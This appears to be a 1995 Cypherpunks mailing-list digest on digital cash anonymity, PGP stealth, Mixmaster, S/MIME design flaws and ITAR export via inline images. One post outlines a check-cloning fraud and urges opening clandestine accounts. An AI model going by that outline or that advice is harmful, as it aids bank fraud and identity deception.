completed. Then, when Alice tries to spend the "same" digital cash with Charlie, he sends his data to the bank and the bank tells him the money has already been spent. Charlie informs Alice that the transaction has failed, that her money is no good. I'm not claiming this is how Chaum's currently-available system works, only that nothing in Chaum's scheme hinges on a True Name, of course. So with online clearing, the second spending is blocked, but there is still no leakage of identity, is there? >The fundamental requirement of preventing double spending implies that >Bob's and Charlie's data, when sent to the bank, has some correlation >which will identify the fact that they both come from the same coin. >It doesn't matter exactly what the form of this data is, or how it has >been blinded and stirred, but if double spending is to be detected >there must be a correlation which the bank can see. I agree. But this is like the following analogy: Alice has a special kind of money, called a "train locker combination." This special kind of money is the location of a storage locker and the combination of a lock on the locker. She "spends" this special kind of money by giving this information to the person she is paying. The recipient has a couple of basic options: 1. Send someone to verify that the locker contains the specified goods, at which point the transaction is completed. This is equivalent to ONLINE CLEARING. (I'm not going to get into the situation where he gets the money, then cancels or reneges on the deal....this is a possibility in "cash" transactions as well, save with escrow schemes, and even then...) 2. Accept the word of Alice (in the sense of not actually transferring the money via online clearing) and count on systems which implicate her if she tries to spend the money a second time, i.e., tries to tell someone else the locker and combination. (The "observer chip" option Chaum raises, and which may have a parallel here, I'm not considering. I'm deeply suspicious of solutions calling for tamper-resistant hardware...just not very strong by cryptographic standards, etc. Maybe I'm just ignorant, but the observer chip approach Chaum described in his "Scientific American" article a few years ago was unconvincing to me.) The elegance of the first option, online clearing, is that Alice is motivated to keep her secret information (the money) secret, and that once it is "spent," or cleared and transferred, there's no going back. She can't renege, she can't collude with the bank to see where it went. The bank, upon valid receipt of an order to "cash" the "check" then could place the money in an "envelope" (in Chaum's terms) supplied by Bob and then post it in a message pool. (Bob can submit his claim to the money via remailers, and receive the money-in-envelope via remailer return replies (if they ever get perfected, as I suspect they will be) or via message pools. Bob receives the envelope and reverses the blinding operation, thus having cash not traceable to him in any way. I'm persuaded that the second approach, involving protocols for revealing double spending, is much messier than the "he who gets there first" protocol. The online clearing model largely emulates how real physical cash works, where there is a direct transfer, where the cash must be protected against loss (lose it and you're just out of luck, unlike, say, as with traveller's checks, which are account-based), and where a kind of "online clearing" is actually done when the cash is checked to see if it's counterfeit. >But this correlation is what makes the coin traceable. Suppose Alice is >paying a coin to Bob via an anonymous network, and she and the bank >are going to try to figure out who he really is. She goes through the >payment transaction, and Bob sends his resulting data to the bank. >Before doing so, though, Alice simulates a payment of the same coin to >Charlie. Charlie doesn't actually have to be involved, Alice can just >go through what she would have done if she had spent the coin elsewhere. >The result of this simulated payment has been shared with the bank. With online clearing, this kind of "sting" by Alice is impossible (at least in the way described here). Alice pays Bob, Bob sends his data to the bank, the bank reports the money has already been transferred (or, simply reports back "invalid transaction"). An account-based system, one that doesn't do online clearing, will need the correlation that Hal cites. An online system will not...whoever gets to the money first gets it, as with real cash. (There are more abstract ways of viewing this advantage. While mere software is always duplicable, and cash numbers are of course duplicable, one thing that is not duplicable is this: "the first agent to present a valid number at this bank." There can be only one of these, and this uniqueness is what keeps the currency from collapsing, what introduces _conservation_ into the system.) >Now, when Bob deposits his data, the bank compares it with the data >Alice sent, the result of her simulated spending of the same coin. By >the argument presented above, Bob's deposit will be flagged. It will >correlate with the data Alice sent in since this will be the equivalent >of a double-spending. So when Bob makes the deposit he can be linked to >the specific coin payment which Alice made, and his anonymity is lost. Well, since Alice knows her own blinding factors, she will always be able to say to the bank: "My cash will look like this. Watch for it." The key is for Bob to take the cash Alice gives him and communicate to and from the bank with mixes, as described above. Bank / \ / \ / \ Alice - - - Bob (Sorry I can't flesh out this diagram....ASCII just won't cut it. Mere English is even worse at describing these transactions.) Another elegant way of viewing things: If Alice colludes with the bank, by doing a fake-spend with the fake "Charlie," or by reporting to the bank what her blinding factor will be and hence what "her" cash will look like, then effectively the transaction collapses to: Alice/Bank \ \ \ Bob But if Bob can get cash from the bank that the bank cannot trace, via the blinding factors, then Bob can get cash from the Alice/Bob collusion. The fact that Alice can correlate a particular transaction to Bob's contact with the bank can be defeated by Bob using anonymous remailers to protect his identity. My Apologies: I suspect I've been rambling a bit, thinking out loud by typing. There are different issues involved here: offline vs. account-based systems, the use of remailers and message pools to sever the links between transactions and identities, and the (mostly unmentioned) role of third-part escrow agents and "anonymizers." (Think of what happens when online clearing is used to shuttle the cash between N different agents...even if Alice is colluding, will Candy, Devon, Eric, Floyd, etc. all be in the same collusion set?) >It would seem that any system which is capable of detecting double- >spending just from the information which the payees send in to the bank >would be vulnerable to this. Systems which use tamper-proof observer >chips to prevent double spending beforehand can avoid it, but of course >if someone breaks an observer the whole cash system might crash. In >general it does not look like payee anonymity is possible without giving >up other very important features. I don't think all systems must be able to deal with double spending. For example, the first person to read this number: 45%2)d[12ks&Qmdx and to then submit it any form--in person, by e-mail, via remailer, etc.--to The First Bank of Cyberspace will have $10 sent to him or her, as cash or as a spendable amount of digicash (untraceable to recipient, of course). Where's the payee traceability that I, the payer, have? (The key is that I don't have to deal with double spending, as there is only one "first person to ....") I believe Chaum has thought about the issues in creating "Pure Digital Cash." While a pure "digital coin" may not be possible, I believe a two-way untraceable digital cash system is possible. Frankly, I think Chaum's work on DC-Nets points the way, though even simpler realizations may be enough for practical purposes. My hunch, just a hunch, is that Chaum has been concentrating on the particular protocols which avoid online clearing and which avoid avoid the payer/payee untraceability for pragmatic reasons. Pragmatic as in "politically wise." --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From stewarts at ix.netcom.com Fri Sep 15 00:26:14 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Fri, 15 Sep 95 00:26:14 PDT Subject: PGP in UK - snooped as unSTEALTHed? Message-ID: <199509150725.AAA11217@ix3.ix.netcom.com> At 06:29 AM 9/12/95 -0400, Perry wrote, replying to Gary: >> When are the PGP designers and coders going to get serious >> and develop STEALTH PGP inside PGP itself!? >Never, I hope. It would dramatically lower the utility of the >system. Can you imagine how disgusting it would be to try decrypting >something if you have a dozen keys outstanding? I disagree - if it's done right, the degree of stealth can be user-selectable, and even moderately stealthy options can tell which key to use without giving away much information. (For instance, 4 bits of keyid isn't very revealing, but will tell you which one or two of your dozen keys to try.) Have the most non-stealth options indicate that it's PGP-encrypted and addressed to keyid 0x12345678, Joe User , blah, blah. The basic problem is that stealth wasn't an original design criterion, so many parts of the PGP data format reveal at least that PGP is being used, and occasionally other information as well. Some things are easy to work around (----- BEGIN PGP etc.), and some aren't. Changing this takes a substantial amount of redesign. >Not to mention how >hard it would be to deal with figuring out that you should even try to >decrypt things in the first place. As you say a couple paragraphs later: >If someone sees a bunch of random numbers in mail sent by me, it's going >to be pretty obvious what the hell is inside anyway. Similarly, if someone emails you a bunch of random numbers.... >I very much see this whole thing as a non-issue. Most of the time, for most users now, it's not an issue. But there are people who will need to hide encrypted messages, and as anti-privacy laws in the US become stronger, that may be us. Is this an issue for PGP 3.0.1, or an issue for Privacy:TNG? Probably the latter, given the state of the PGP world, and certainly ranting at the developers to do it now is uncool. But it should be a design goal. #--- # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From unicorn at polaris.mindport.net Fri Sep 15 00:27:55 1995 From: unicorn at polaris.mindport.net (Black Unicorn) Date: Fri, 15 Sep 95 00:27:55 PDT Subject: Check Cloning frenzy and attack on anonymous accounts Message-ID: Cypherpunks might want to take note of the recent flurry of news program stings on banks which do not demand 12 pieces of identification in order to open an account. The latest horseman, check "cloners." Two networks have now run hidden camera stings on banks where they offer all manner of obnoxious fake identification and open accounts in silly names. The "purpose" being to expose the ease with which a dreaded check "cloner" can open an account to transfer your funds into. The process goes something like this: Check cloner gets account number from ATM slip or otherwise. Check cloner prints up 30 "checks" in any name at all with magnetic ink account number on the bottom for the benefit of automatic readers at the bank. Checks are written to the account in false name and withdrawn. For some reason, the focus seems to be on the ease with which one opens an account- rather than with the need to safeguard account information, and the lack of oversight by banks. Of course, the liability for these crimes is with the bank, which cleared a check without the proper signature. Of course, the immediate solution, rather than insuring the banks pay their liability for their insecure payments and check clearing system, and their printing account information on any piece of paper they can find, is going to be a crackdown on account identification- and probably legislation. (Note that often banks take months to pay the shortfall- when they do at all). New accounts can expect to have to cough up significant identification and I predict a re-newed call for national identification credentials. Tell the banks they have to pay within 2 days of the presentation by the duped depositor of the fraudulent checks and I would lay odds that the banks would be screaming bloody murder for a more secure payments and check clearing system than the trash they have now. Of course, because of the ignorance of the media, this will never happen. Of course, paying in cash will never be looked to as an answer either. Typical creeping statism. I suggest those of you who open clandestine accounts open a flurry now, before things get tough. From loki at obscura.com Fri Sep 15 01:06:28 1995 From: loki at obscura.com (Lance Cottrell) Date: Fri, 15 Sep 95 01:06:28 PDT Subject: Mixmaster status Message-ID: -----BEGIN PGP SIGNED MESSAGE----- I apologize for being so terse in my first message. This is not a red herring. The organization that has approached me is very pro-privacy and anonymity. I see nothing but good coming from this venture. I will be very active in the development of the commercial version of Mixmaster. Let me be crystal clear. 1) I will not support any version of Mixmaster that is weakened. 2) All future clients will be able to generate the current message format. 3) All future servers will be able to read the current message format. 4) There will always be a free version of the client with source code. While I have not discussed it, I can not imagine that there would not also be a free version of the server code (with source). Without remailers what is the point of the client software? At 8:45 PM 9/14/95, ROBO Mixmaster Remailer wrote: >Flame Remailer wrote: > >> Subject: Mixmaster status >> >> There has been an offer to purchase and commercially develop Mixmaster. >> This will hasten the development of Mixmaster for other platforms (e.g. >> Dos, Windows Macintosh), and bring significant improvements to the >> interface, but I will not compromise on the level of security provided by >> Mixmaster. Free client software will continue to be available. >> >> This could be the big breakthrough for remailers, finally thrusting them >> out of the hobbyist's closet into the corporate world. >> >> I wonder. Where is the commercial market for remailers? Who has an >> application for them except hobbyinst? Why would there be a commercial >> incentive to run a mixmaster server, or even a client? >> >> Could this "offer" be a red herring? > >I wondered the same thing myself. It would certainly be a more >cost-effective way for the NSA to compromise Mixmaster technology >than by brute force. > >Consider this scenario ... Mixmaster get's bought by the Acme >Crypto Company of Ft. Meade, MD. They "improve" it, and offer a new >version. It's even FREE (for non-commerical use)! But their >"improvements" make it incompatible with previous versions, and so >you have to upgrade. The new "commercial" version comes with no >SOURCE CODE, of course... -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBMFkzR/Pzr81BVjMVAQH6hAf+O+QdTEzNjUh0FYlJEnCakNws4MxPrOt4 miMPaz/aWDOReGb62UPZAEMNXP+hjgy0kTjW4xReTTBAPgtcsInr1Cct6MPr3O/r PGMGmE9z2Fkv3/k7MDG1NiptT2/RwVtmDikIJEQuH5j8ijir28Vvrk9Vs685Qc3j bFz5Q8uRLd57Uk51tQwIiBM6CJ4suQ3WFN++QNTHM9E47J9W8yFBux6ePWPlZOK8 8BnKkhY/auPm85X3MVZhL3y7F6zbFuqPpZrsKpwOOkme8o4l71t2xyhGcZHHxiB7 JLF2As9pNXsKWpYiPZEHTV9hsgxQTHortdhq25DeGyoxhZSrZByP/w== =+O16 -----END PGP SIGNATURE----- ---------------------------------------------------------- Lance Cottrell loki at obscura.com PGP 2.6 key available by finger or server. Mixmaster, the next generation remailer, is now available! http://obscura.com/~loki/Welcome.html or FTP to obscura.com "Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come." --Nietzsche ---------------------------------------------------------- From don at cs.byu.edu Fri Sep 15 01:48:22 1995 From: don at cs.byu.edu (Donald M. Kitchen) Date: Fri, 15 Sep 95 01:48:22 PDT Subject: Why ecash is traceable Message-ID: <199509150847.CAA03047@bert.cs.byu.edu> -----BEGIN PGP SIGNED MESSAGE----- Excellent discussion on the subject, actually. However, your idea of the "first person to the bank" maintaining anonymity via remailer block is flawed. First of all, if a collusion with the bank is being taken into account, presumably sufficient enough resources are involved that someone may try and track the reply block. Mixmaster (as your messages mentioned by name) would be necessary to eliminate the chance of tracking the block through combinations of replay attacks etc. (Which reminds me, has anyone implemented an Expiration date on Type I remailers yet?? I remember someone telling me it was being put into the RFC) However, mix does not have a reply block system. Nor are there any Type I -> Mix gateways, for reasons mentioned months ago. (PS, For historical sake, I was a strong supporter of a Shamir Sharing Shell Game[tm] with the type I message. Everything during those months came out of a rant program, so I can hardly expect you to have saved them) Soooo... Anyone up for a Shamir Sharing Shell game? Of course, a drop box system would be *much* sexier. Combined with, say, an encrypted socket, or maybe MIXing a packet straight to your door. (Every client a mix site, remember? Just make yourself a mix key and give it to the drop box. I figure if the TLA has you by then, you might as well trust the drop-box operator too) ObMiscCrypto: Cypherpunk archives seem to have been down for a month, and a mailto:// didn't wake anybody up. I got a message from Bob Silverman, apparently he would not be opposed to giving his software to the C-punk key Cracking Ring, Inc. as a group on the understanding that the group lend him some factored numbers. He reports having no PGP key, so getting a PGP sig won't be happening. Perhaps someone who knows him or someone who knows about factoring software would volunteer to get the goods? ObHiMom: Hi Mom. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQB1AwUBMFk9cMLa+QKZS485AQHEpgL8C2N2eioUPaMqLlbzFL29F5zvq50J1o1+ nyoVxV51U4mglT40J8XZmF3/+15mN0aDbbA1NbOzd/7x20TeXnOwGGRHB2iHF0NB k++VRMrwX85MZ5snlf/c0l5XGnxKEuU6 =7hGk -----END PGP SIGNATURE----- fRee cRyPTo! jOin the hUnt or BE tHe PrEY PGP key - http://bert.cs.byu.edu/~don or PubKey servers (0x994b8f39) June 7&14, 1995: 1st amendment repealed. Death threats ALWAYS pgp signed * This user insured by the Smith, Wesson, & Zimmermann insurance company * From stewarts at ix.netcom.com Fri Sep 15 02:08:39 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Fri, 15 Sep 95 02:08:39 PDT Subject: DD, pedophiles, and Terrorists, oh my Message-ID: <199509150908.CAA22145@ix3.ix.netcom.com> At 11:21 PM 9/14/95 -0400, Phill wrote: >Yes, I was specificaly refering to hard core images depicting intercourse with >minors, including very young children. This was injected into the USEnet over a >period of about 3 months from a number of sites. I do not know if the persons >arrested today are the alledged source. Anybody interesting in doing a FOIA to find out whether the government is posting them? For that matter, is the Post Office, as a semi-non-governmental organization, subject to FOIA? #--- # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From stewarts at ix.netcom.com Fri Sep 15 02:08:46 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Fri, 15 Sep 95 02:08:46 PDT Subject: Why ecash is traceable Message-ID: <199509150908.CAA22153@ix3.ix.netcom.com> I first reacted to Hal's posting about the way Tim did. I got confused by the "Charlie" issue, but I think I see it. >Why not "online clearing" as the preferred model, then? It's probably still possible to do _some_ tracing in an online system. As in the previous example, Alice is going to conspire with the bank to catch Bob, _before_ she pays Bob the money; afterwards is too late. Alice creates an account Alice2 and spends the cash. Then she pays Bob the same cash. When Bob tries to deposit it, the bank notices it's already been spent, and does one of 1) rejects the payment using the normal double-spending prevention (not very useful for kidnapping/ransom cases, since Bob may kill the victim or whatever) 2) detects the double-spending but uses special-case software to tell Bob they're accepting the payment, and trace his account or trace the place he's depositing it from, or not actually credit it the money they're sending him a receipt for, or whatever. If Bob wants to prevent the bank from tracing his deposit back to him, he'll need an anonymous on-line connection; this would probably need to be some sort of packet laundry, which is easy enough to implement, or at least a fancy firewall. If Bob is a real Bad Guy (as opposed to Alice being the Bad Guy), Bob will probably set up some kind of temporary account at the bank to deposit the money in, followed rapidly by withdrawing the money and abandoning/closing the account. If Bob is a kidnapper, he probably kills the kid; if he's just an undocumented retailer, he may not ship the pharmaceuticals, or may start announcing that Alice is a probable narc. >[online clearing vs. double-spender detection] >I'm persuaded that the second approach, involving protocols for revealing >double spending, is much messier than the "he who gets there first" >protocol. The online clearing model largely emulates how real physical cash There are difficulties, with online clearing, though - with physi-cash, Bob can look at it and say "it looks good/bad" without actually possessing it; with online clearing, he can lie about "it was pre-spent", and there's no way to let him check the cash except by either giving it to him or using messy all-or-nothing-disclosure-of-secrets techniques (e.g. Alice and Bob flip a coin to decide whether Bob gets to spend a pre-committed digibuck or Alice gets to demonstrate that it's ok and spend it first) though an online system could reduce this problem substantially by recording the time that a given digicash was spent and reporting that time in double-spending rejections (a first-spending at approximately the same that Alice gives Bob the money and he deposits it is obviously suspicious; it doesn't actually identify which one of them cheated, though they'll both know (unless it was the bank cheating). A first-spending time substantially before that implicates Alice.) >Well, since Alice knows her own blinding factors, she will always be able >to say to the bank: "My cash will look like this. Watch for it." Unfortunately, it's probably a lot harder to design a blinding system that lets the payee blind the cash without allowing him to create forged bills (at least forged bills based on a hard-to-identify original bill.) >My hunch, just a hunch, is that Chaum has been concentrating on the >particular protocols which avoid online clearing and which avoid avoid the >payer/payee untraceability for pragmatic reasons. Pragmatic as in >"politically wise." maybe so... #--- # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From stewarts at ix.netcom.com Fri Sep 15 02:09:11 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Fri, 15 Sep 95 02:09:11 PDT Subject: Scientology/Wollersheim as test case for key disclosure Message-ID: <199509150908.CAA22173@ix3.ix.netcom.com> At 02:42 PM 9/9/95 -0400, Phill wrote: >One solution to this problem would be to modify PGP so that the session key for >the document was released rather than the passphrase for the public key. The >former would provide only read access, the latter would allow th scientologists >to forge Wollerstein's signature on other material. In addition many of the >documents may be subject to privillege. It wouldn't be hard, though I'm not sure it's much different from requiring the owner of the public key to decrypt the document in the first place. It does give you some verifiability (somebody else can take the session key and demonstrate that encrypting it with the recipient's public key does or does not produce the encrypted-key string in the document being verified.) If that's what you plan to use it for, you would also need to have the entire padded session key and not just the session key itself. Total amount of work to implement - another command-line option, a print statement, and maybe another command-line option and bit of code to allow decryption of a public-key-encrypted document using a command-line-supplied session key. #--- # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From alano at teleport.com Fri Sep 15 02:23:14 1995 From: alano at teleport.com (Alan Olsen) Date: Fri, 15 Sep 95 02:23:14 PDT Subject: Mixmaster status Message-ID: <199509150922.CAA12760@desiree.teleport.com> >Let me be crystal clear. >1) I will not support any version of Mixmaster that is weakened. >2) All future clients will be able to generate the current message format. >3) All future servers will be able to read the current message format. >4) There will always be a free version of the client with source code. But will the commercial version of the server come with source code? >While I have not discussed it, I can not imagine that there would not also >be a free version of the server code (with source). Without remailers what >is the point of the client software? Will Mixmaster become the Netscape(tm) of remailers? And when is the IPO? ];> | Visualize whirled keys | alano at teleport.com | |"It's only half a keyserver. I had to split the | Disclaimer: | |other half with the government man." - Black Art | Ignore the man | | -- PGP 2.6.2 key available on request -- | behind the keyboard.| | http://www.teleport.com/~alano | | From liberty at gate.net Fri Sep 15 02:49:17 1995 From: liberty at gate.net (Jim Ray) Date: Fri, 15 Sep 95 02:49:17 PDT Subject: cryptography eliminates lawyers? Message-ID: <199509150944.FAA48388@tequesta.gate.net> -----BEGIN PGP SIGNED MESSAGE----- Brian Davis wrote: >Last I checked, FDA, UL, or state bar association approval does not >*require* you to take, use, or hire the approved drug, toaster or lawyer. >Market forces are still at work, albeit in a filtered environment. The filter is weakest from UL, yet I trust its output the most. >Just a first cut. And even that can usually be gotten around. Getting around David KeSSler involves about $30 million and a *bunch* of lawyers. Skipping this first cut, even with far safer products (IMO) than "Proscar," can lead to an armed raid of your doctor's office. If state bars can usually be gotten around, why take three of them? JMR -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Freedom isn't Freeh iQCVAwUBMFk2Jm1lp8bpvW01AQESMwP/abBCBbhGKOjVFFkjl4elOcTA3oD9WgEa e+AsmtuLSEstvSfZ6u3CxO5sfu0lka0erBsVyDjqWs97WlvQOD0qX+3O91hoURp4 pytfTSE+MtTlIQCIoxVBMgjOYplNLOOYmnomksypJFpOzyuofoYnIScfRLkAWvAB SFEqvrCtfP8= =cfgW -----END PGP SIGNATURE----- Regards, Jim Ray "When making public-policy decisions for the government, I think one should ask oneself which technologies would best strengthen the hand of a police state. Then, do not allow the government to deploy those technologies." -- Phillip Zimmermann, talking to himself. (Congress sure-as-hell wasn't paying attention!) ----------------------------------------------------------------------- PGP key Fingerprint 51 5D A2 C3 92 2C 56 BE 53 2D 9C A1 B3 50 C9 C8 Key id. # E9BD6D35 James M. Ray ----------------------------------------------------------------------- Help Phil! email zldf at clark.net or see http://www.netresponse.com/zldf _______________________________________________________________________ From aba at dcs.exeter.ac.uk Fri Sep 15 02:57:45 1995 From: aba at dcs.exeter.ac.uk (aba at dcs.exeter.ac.uk) Date: Fri, 15 Sep 95 02:57:45 PDT Subject: Linking = Showing = Transferring? Message-ID: <9935.9509150957@exe.dcs.exeter.ac.uk> Rich Salz writes: > >Suppose we interpret Linking = Showing as > > > >For all web pages x and y, > >Showing(x) and Linkto(x,y) --> Showing(y) > > Then we would be fools. No more so than buying a book means you > have instant access to all resources mentioned as footnotes or in > the bibliography. > > Put more simply, *you have to click on Y* so they're not the same. Another even more subtle problem is inline images, can you say that a page with an inline image sourced from a foreign site must obey the foreign jurisdiction. I would assert this is so, because the web surfer's *browser* imports the relevant parts of the page from whatever locations (and jurisdictions) they are in, and displays them as one page. Take a look at: http://www.obscura.com/~shirt/ which is the www space Lance kindly donated for the UK munitions-T. The relevance to this discussion is that www.obscura.com is of course in the US, whilst the inline graphic is in the UK for ITAR reasons, the is of: #!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL $m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa 2/d0 So that the image is *imported* by the *viewer*, and not supplied by www.obscura. This means that people outside the US can also view the page with out anyone breaking any laws, even though it appears to contain (allegedly) ITAR contravening material. Same would apply quite nicely to porn from the netherlands etc. [as an aside, any one got info on how you go about converting gifs to transparent gifs - I want the above to be transparent so that it still works on other than a black background in case other people use it on other backgrounds] Adam From frissell at panix.com Fri Sep 15 02:59:33 1995 From: frissell at panix.com (Duncan Frissell) Date: Fri, 15 Sep 95 02:59:33 PDT Subject: Linking = Showing = Transferring? In-Reply-To: <199509150047.UAA18025@book.hks.net> Message-ID: On Thu, 14 Sep 1995, Lucky Green wrote: > The answer is trivial. If it pisses of the fascists in power enough, you > go to jail or get killed. > > - -- > - -- Lucky Green As a libertarian nut, I bow to no one in my love of extreme statements. But I feel compelled to sqaush this particular notion whenever I see it. Randy Weaver really pissed off the Feds and did not go to jail (except during trial) and received a $3.1 million settlement. (.1 to him, 3 to the kids but they are minors). DCF From rsalz at osf.org Fri Sep 15 04:15:11 1995 From: rsalz at osf.org (Rich Salz) Date: Fri, 15 Sep 95 04:15:11 PDT Subject: Linking = Showing = Transferring? Message-ID: <9509151114.AA07872@sulphur.osf.org> >Another even more subtle problem is inline images, can you say that a >page with an inline image sourced from a foreign site must obey the >foreign jurisdiction. I would assert this is so, because the web >surfer's *browser* imports the relevant parts of the page from >whatever locations (and jurisdictions) they are in, and displays them >as one page. Inline images are not references -- they are part of the page being retrieved. > >So that the image is *imported* by the *viewer*, and not supplied by >www.obscura. Inlined images are just a convenient way of chunking. The image is imported by the viewer because the server, as part of the base document, told it to do so. You might be able to fool an ignorant court, but it still doesn't change the fact that Lance has a document that in the natural course of operation of the Web, exports crypto. I would advise him to edit the page so it reads Click here to see a picture of the shirt. Heck, the very word, "inline" gives it away. /r$ From rsalz at osf.org Fri Sep 15 04:18:35 1995 From: rsalz at osf.org (Rich Salz) Date: Fri, 15 Sep 95 04:18:35 PDT Subject: Some informed comments on RSA's S/MIME Message-ID: <9509151118.AA07881@sulphur.osf.org> Date: Thu, 14 Sep 1995 08:39:49 -0700 (PDT) >From: Ned Freed Subject: Re: Re[2]: MOSS conformance testing Cc: pem-dev at TIS.COM Message-id: <01HV9F2PHBSU8Y4Z8U at INNOSOFT.COM> > I just got wind of RSA's draft for Content-Type: application/x-pkcs7-mime. > Has there been any discussion on this - comparison to PEM etc.? If so > where's the list, URLs of archives....? Or did I just go "deaf" for a while > here on thist list? (The last could of months have been caught up in > changing companines...) S/MIME was developed privately by RSA in conjunction with a number of other companies. To the best of my knowledge all discussion has occurred on closed, private lists. As a potential customer of RSA I recently managed to get myself added to one of these lists (it may or may not be the only one where S/MIME is discussed) but I haven't had time to post anything there yet. I plan to post this message there in the next couple of days. I'm not saying this approach to protocol development is a good thing or a bad thing, but I do believe that it has led to the production of a specification that is seriously flawed, and that those flaws would have been detected and probably corrected had the discussion been more public. More on this below. > I browsed through the IETF drafts & personal contributions & search tool... > didn't find anything on RSA's "S/MIME". > I did get the PostScript file from RSA's pages & had a read.... > http://www.rsa.com/pub/S-MIME/ The specification, at least, is public. Given the amount of press surrounding this proposal and the strong liklihood of it being widely used I strongly recommend that everyone who is interested in email security obtain a copy of the specification and read it. However, the proposal is simple enough that it can be summarized in just two paragraphs. S/MIME is based on PKCS #7, which in turn is based on classic PEM. The significant difference between PKCS #7 and PEM is that it uses an ASN.1 encoding for the entire security object rather than the header/text encoding of RFC1421. In fact the specification states that mechanical conversion between RFC1421 formats and PKCS #7 should be possible as long as the proper set of algorithms are used. I think that mechanical conversion into and out of the PEM-derived subset of MOSS is also feasible but I haven't checked up on the specifics of this. S/MIME in turn is a simple encapsulation of PKCS #7 in MIME, consisting of an application subtype label and an encoding of the PKCS #7 object using standard MIME encodings. The inner secured content is then seen as another MIME object. This is almost identical to Jeff Schiller's earlier proposal for embedding PEM in MIME. There is only one significant twist -- in the case of signed but not encrypted data the specification calls for the use of multipart/alternative, with the first part being an unsigned copy of the signed data and the second part being the PKCS #7 object, including the signed data. Two obvious flaws in this approach should be obvious from this description. The first is simply one of excessive overhead -- sending signed material in such a way that it can be read on vanilla email systems as well as with an S/MIME system introduces something on the order of 133% overhead. The second flaw is more serious. The data that a user without S/MIME reads is not signed. This opens the door to attacks where the unsigned version is tampered with but the signed version is left alone. This turns into a really insidious problem when you consider how privacy services are likely to be deployed in some environments. One model I expect to be rather popular is that of having a remote signature verification service within a secure enclave. That is, most of the user agents that people use won't have the ability to validate a signature. Users will, however, have secure access to an agent that will validate the signature on a message for them. (The service may well be a different application on the same machine.) They simply submit the message to this service and it tells them whether or not the signature matches. The problem, of course, is that the material the user of the unextended agent reads isn't what's signed. And in general there is no way to correlate this material with the signed copy -- since it was exposed to the message transport layer without any special tagging to indicate its signed nature the transport may well have changed it so its no longer a byte-for-byte copy of the signed version (which is inherently protected against such munging). Comparing this approach with security multiparts is quite instructive. Security multiparts only introduces the overhead necessary to encode the single copy of the data -- at most 33% in the case of base64 -- plus of course the fixed overhead of the signature information. As such, it is far more efficient than S/MIME when it comes to signed but unencrypted material. Security multiparts can be processed in a single pass as well. I'm not sure this is true of S/MIME -- it depends on the specifics of the ASN.1 structure that's used. But by far the most important difference is that security multiparts do not suffer from this vulnerability when used in an environment with remote security servers. You can of couse avoid this problem by not including the extra copy of the signed material. The problem with this approach is that you won't be able to read such a message on anything short of an agent that knows how to take apart a PKCS #7 structure. I note in passing that there was absolutely no reason why security multiparts could not have been used in S/MIME instead of the chosen encapsulation. PKCS #7 explicitly provides a facility whereby the secured data is stored outside of the ASN.1 object. This then fits seamlessly into the security multiparts methodology. I do not propose to debate the relative merits of PKCS #7 versus MOSS. Modulo the MIME issues this is essentially the same as debating the merits of PEM versus MOSS, and I've had more of that than I care for. Besides, I think folks should use whatever security service they feel like using. I've maintained all along that my interest is primarily that of standardizing on a single embedding methodology for use with MIME. I'm very disappointed that S/MIME has seen fit to use what to my mind is a technically inferior embedding solution when compared to security multiparts, and I'd really like to try to get the S/MIME folks to switch to a security multiparts approach if its not too late for them to do so. I'm very interested in any and all comments on what I've written here. I intend to post them to the S/MIME list I'm now on. Ned From aba at dcs.exeter.ac.uk Fri Sep 15 04:43:58 1995 From: aba at dcs.exeter.ac.uk (aba at dcs.exeter.ac.uk) Date: Fri, 15 Sep 95 04:43:58 PDT Subject: Linking = Showing = Transferring? In-Reply-To: <9509151114.AA07872@sulphur.osf.org> Message-ID: <10345.9509151143@exe.dcs.exeter.ac.uk> > > [using inline images to display theoretically ITAR violating gifs] > > Inline images are not references -- they are part of the page being > retrieved. > > > > >So that the image is *imported* by the *viewer*, and not supplied by > >www.obscura. > > I would advise him to edit the page so it reads > > Click here > to see a picture of the shirt. I wrote the page, Lance kindly provided www space which I set up, he's seen it, and thought it funny even. Sounds like you seriously think this is a danger to Lance, something I hoped I avoided by using an inline from outside the ITAR zone. > Inlined images are just a convenient way of chunking. The image is > imported by the viewer because the server, as part of the base > document, told it to do so. You might be able to fool an ignorant > court, but it still doesn't change the fact that Lance has a > document that in the natural course of operation of the Web, exports > crypto. Weeell, I'm not so sure. I mean the page says to view this page first get this picture from here, this one from here, this text, format and display. It is not illegal to say *where* to get crypto, just illegal to export it, right? He hasn't exported it, just told the viewer where to fetch it from. I think this case is safer than the porn one, because the actual data in this case is legal in both jurisdictions, it just must not be transferred from jurisdiction US -> jurisdiction non-US, which it has not been. If it were something which where illegal in the US, hmm, lets say an image of a slightly underage (underage under US definitions, not dutch) dutch porn star, then having links to it might be argued as incitement to view something which it would be illegal to view in the US, something which is effectively illegal to import into the US. I would agree with you were the information imported by way of an inline image actually illegal in the US, as the person loading would have no choice. In such a case a disclaimer might be appropriate: warning, it may be illegal to import the following link into the US, I will not be responsible if you are in the US and click on this link But what is there to disclaim with inline data which is itself legal in both jurisdictions, and the only legal question being the transfer of that data from US -> UK, which the protocol ensures does not happen? Browser in the US, text in US, crypto gif imported from UK, both legal. Browser outside US, text in US, crypto gif imported from UK, 